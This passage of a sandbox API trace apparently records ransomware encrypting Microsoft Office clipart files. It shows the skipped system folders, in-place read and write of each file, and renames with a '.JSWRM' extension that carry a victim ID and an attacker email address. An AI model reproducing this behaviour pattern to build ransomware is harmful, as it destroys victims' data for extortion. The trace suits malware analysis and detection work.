dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0094.967] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1027b233, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1027b233, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1027b233, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x16f40, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH02750U.BMP", cAlternateFileName="")) returned 1 [0094.967] lstrcmpiW (lpString1="PH02750U.BMP", lpString2=".") returned 1 [0094.967] lstrcmpiW (lpString1="PH02750U.BMP", lpString2="..") returned 1 [0094.967] lstrcmpiW (lpString1="PH02750U.BMP", lpString2="...") returned 1 [0094.967] lstrcmpiW (lpString1="PH02750U.BMP", lpString2="windows") returned -1 [0094.967] lstrcmpiW (lpString1="PH02750U.BMP", lpString2="recovery") returned -1 [0094.967] lstrcmpiW (lpString1="PH02750U.BMP", lpString2="perflogs") returned 1 [0094.967] lstrcmpiW (lpString1="PH02750U.BMP", lpString2="documents and settings") returned 1 [0094.967] lstrcmpiW (lpString1="PH02750U.BMP", lpString2="$RECYCLE.BIN") returned 1 [0094.967] lstrcmpiW (lpString1="PH02750U.BMP", lpString2="system volume information") returned -1 [0094.967] lstrcmpiW (lpString1="PH02750U.BMP", lpString2="msocache") returned 1 [0094.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0094.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02750U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02750U.BMP", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02750U.BMP", lpUsedDefaultChar=0x0) returned 12 [0094.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0094.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0094.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02750U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02750U.BMP", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02750U.BMP", lpUsedDefaultChar=0x0) returned 12 [0094.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0094.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0094.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0094.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0094.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0094.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0094.968] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02750U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02750u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0094.968] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=94016) returned 1 [0094.968] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x16f40) returned 0x24d210 [0094.968] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x16f40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x16f40, lpOverlapped=0x0) returned 1 [0094.976] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.976] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x16f40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x16f40, lpOverlapped=0x0) returned 1 [0094.976] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0094.977] CloseHandle (hObject=0x314) returned 1 [0094.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0094.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0094.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0094.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0094.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0094.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0094.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0094.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0094.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0094.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0094.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0094.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0094.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0094.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0094.978] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02750U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02750u.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02750U.BMP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02750u.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0094.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0094.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0094.979] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0094.979] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1022edb4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1022edb4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1027b233, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc382, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH02752G.GIF", cAlternateFileName="")) returned 1 [0094.979] lstrcmpiW (lpString1="PH02752G.GIF", lpString2=".") returned 1 [0094.979] lstrcmpiW (lpString1="PH02752G.GIF", lpString2="..") returned 1 [0094.979] lstrcmpiW (lpString1="PH02752G.GIF", lpString2="...") returned 1 [0094.979] lstrcmpiW (lpString1="PH02752G.GIF", lpString2="windows") returned -1 [0094.979] lstrcmpiW (lpString1="PH02752G.GIF", lpString2="recovery") returned -1 [0094.979] lstrcmpiW (lpString1="PH02752G.GIF", lpString2="perflogs") returned 1 [0094.979] lstrcmpiW (lpString1="PH02752G.GIF", lpString2="documents and settings") returned 1 [0094.979] lstrcmpiW (lpString1="PH02752G.GIF", lpString2="$RECYCLE.BIN") returned 1 [0094.979] lstrcmpiW (lpString1="PH02752G.GIF", lpString2="system volume information") returned -1 [0094.979] lstrcmpiW (lpString1="PH02752G.GIF", lpString2="msocache") returned 1 [0094.979] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0094.979] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02752G.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.979] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02752G.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02752G.GIF", lpUsedDefaultChar=0x0) returned 12 [0094.979] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0094.979] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0094.979] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02752G.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.979] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02752G.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02752G.GIF", lpUsedDefaultChar=0x0) returned 12 [0094.979] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0094.979] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0094.979] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0094.979] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0094.979] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0094.979] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0094.979] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02752G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02752g.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0094.980] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=50050) returned 1 [0094.980] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc380) returned 0x24d210 [0094.981] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xc380, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xc380, lpOverlapped=0x0) returned 1 [0094.985] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.985] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xc380, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xc380, lpOverlapped=0x0) returned 1 [0094.985] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0094.986] CloseHandle (hObject=0x314) returned 1 [0094.986] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0094.986] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0094.986] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0094.986] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0094.986] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0094.986] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0094.986] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0094.986] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0094.986] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0094.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0094.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0094.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0094.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0094.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0094.987] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02752G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02752g.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02752G.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02752g.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0094.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0094.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0094.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0094.988] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102a14ae, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102a14ae, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102a14ae, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7c08, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH02752U.BMP", cAlternateFileName="")) returned 1 [0094.988] lstrcmpiW (lpString1="PH02752U.BMP", lpString2=".") returned 1 [0094.988] lstrcmpiW (lpString1="PH02752U.BMP", lpString2="..") returned 1 [0094.988] lstrcmpiW (lpString1="PH02752U.BMP", lpString2="...") returned 1 [0094.988] lstrcmpiW (lpString1="PH02752U.BMP", lpString2="windows") returned -1 [0094.988] lstrcmpiW (lpString1="PH02752U.BMP", lpString2="recovery") returned -1 [0094.988] lstrcmpiW (lpString1="PH02752U.BMP", lpString2="perflogs") returned 1 [0094.988] lstrcmpiW (lpString1="PH02752U.BMP", lpString2="documents and settings") returned 1 [0094.988] lstrcmpiW (lpString1="PH02752U.BMP", lpString2="$RECYCLE.BIN") returned 1 [0094.988] lstrcmpiW (lpString1="PH02752U.BMP", lpString2="system volume information") returned -1 [0094.988] lstrcmpiW (lpString1="PH02752U.BMP", lpString2="msocache") returned 1 [0094.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0094.988] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02752U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.988] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02752U.BMP", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02752U.BMP", lpUsedDefaultChar=0x0) returned 12 [0094.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0094.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0094.988] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02752U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02752U.BMP", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02752U.BMP", lpUsedDefaultChar=0x0) returned 12 [0094.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0094.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0094.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0094.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0094.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0094.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0094.989] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02752U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02752u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0094.989] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=31752) returned 1 [0094.989] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7c00) returned 0x24d210 [0094.990] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7c00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7c00, lpOverlapped=0x0) returned 1 [0094.994] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.994] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7c00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7c00, lpOverlapped=0x0) returned 1 [0094.994] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0094.995] CloseHandle (hObject=0x314) returned 1 [0094.995] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0094.995] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0094.995] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0094.995] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0094.995] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0094.995] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0094.995] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0094.995] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0094.995] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0094.995] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0094.995] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0094.995] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0094.995] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0094.995] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0094.995] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02752U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02752u.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02752U.BMP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02752u.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0094.996] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0094.996] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0094.996] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0094.996] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102a14ae, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102a14ae, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102a14ae, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1a6b8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH02753U.BMP", cAlternateFileName="")) returned 1 [0094.996] lstrcmpiW (lpString1="PH02753U.BMP", lpString2=".") returned 1 [0094.996] lstrcmpiW (lpString1="PH02753U.BMP", lpString2="..") returned 1 [0094.996] lstrcmpiW (lpString1="PH02753U.BMP", lpString2="...") returned 1 [0094.996] lstrcmpiW (lpString1="PH02753U.BMP", lpString2="windows") returned -1 [0094.996] lstrcmpiW (lpString1="PH02753U.BMP", lpString2="recovery") returned -1 [0094.996] lstrcmpiW (lpString1="PH02753U.BMP", lpString2="perflogs") returned 1 [0094.996] lstrcmpiW (lpString1="PH02753U.BMP", lpString2="documents and settings") returned 1 [0094.996] lstrcmpiW (lpString1="PH02753U.BMP", lpString2="$RECYCLE.BIN") returned 1 [0094.996] lstrcmpiW (lpString1="PH02753U.BMP", lpString2="system volume information") returned -1 [0094.996] lstrcmpiW (lpString1="PH02753U.BMP", lpString2="msocache") returned 1 [0094.996] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0094.996] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02753U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.996] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02753U.BMP", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02753U.BMP", lpUsedDefaultChar=0x0) returned 12 [0094.996] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, 